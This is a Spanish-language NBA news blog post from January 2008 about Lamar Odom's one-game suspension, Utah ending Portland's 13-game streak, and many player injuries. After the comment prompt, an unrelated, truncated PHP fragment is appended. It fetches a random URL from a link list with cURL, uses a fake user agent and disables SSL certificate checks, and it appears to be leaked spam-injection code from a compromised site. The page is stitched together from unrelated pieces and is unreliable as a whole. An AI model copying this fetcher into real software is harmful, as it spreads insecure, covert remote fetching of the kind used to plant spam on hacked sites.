¡Año Nuevo, noticias frescas!

02 de January de 2008 por MagicJohnson32

¡Feliz Año Nuevo a todos los aficionados a la NBA de parte de toda la gente de TJNBA! Mientras esperamos impacientes que se reanude la competición tras el tradicional día de descanso del primero de año, os traemos unas cuantas noticias con la actualidad de la liga: lesiones, estadísticas y una sanción que encabeza nuestros primeros titulares de 2008.

Odom, sancionado un partido: Lamar Odom se perderá el primer partido del año, el que Los Angeles Lakers jugarán el viernes ante Philadelphia 76ers, tras ser sancionado con un encuentro. El motivo de la sanción es la falta que el jugador neoyorquino cometió sobre Ray Allen en el choque entre Lakers y Celtics del pasado día 30, una acción en la que Odom se abalanzó sobre el escolta celtic y le golpeó una vez que ambos jugadores se encontraban en el suelo.

Se acabó la racha de los Blazers: a la tercera fue la vencida para los Jazz. Los de Salt Lake City acabaron con la racha de trece triunfos consecutivos de los Blazers, una serie de victorias que incluía dos sobre los propios Jazz y que ha permitido al equipo entrenado por McMillan (quien se ausentó del encuentro debido a motivos personales) auparse hasta plazas de Playoffs. Los 13 triunfos seguidos suponen la segunda mejor racha en la historia de los Blazers, sólo por detrás de los 16 obtenidos en la temporada 1990-1991.

Durant y Wilcox, day to day: los Sonics perdieron a dos de sus titulares en el partido ante los Sixers, que se cerró con derrota para los de Seattle. Ambos están considerados como day to day por sus respectivas lesiones, Durant en el dedo índice de la mano izquierda, y Wilcox, en la rodilla izquierda.

Más lesionados: el extenso parte de lesionados incluye a Tracy McGrady, que sigue recuperándose de su maltrecha rodilla izquierda y que puede llegar a perderse alguna semana más de competición. No estará solo ya que su compañero Steve Francis estará de baja durante unos cuantos partidos por una lesión en el cuadriceps. En los necesitados Clippers, Tim Thomas puede regresar a las canchas esta misma semana, aunque no será hoy. Mo Williams se perdió el último partido por molestias en el tendón de Aquiles y es duda para el de esta noche ante los Heat, que siguen sin poder contar con Shaquille O’Neal, Jason Williams y Dorrell Wright, aunque recuperan a Chris Quinn. Los Nets esperan contar con Antoine Wright ante Orlando, mientras en los Knicks se mantienen las dudas sobre Jamaal Crawford y Stephon Marbury. Los Kings tienen buenas noticias, ya que Kevin Martin regresará la semana próxima y Mike Bibby podría hacerlo hacia mediados de mes, todo eso si sus recuperaciones siguen el buen camino, por supuesto. Artest fue operado del codo y estará de baja un tiempo aún por concretar. El jueves podría producirse el regreso de Ginóbili, que sigue recuperándose de la lesión en su mano izquierda, mientras que para esta misma noche se espera el retorno de Antonio Daniels al quinteto titular de los Wizards.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>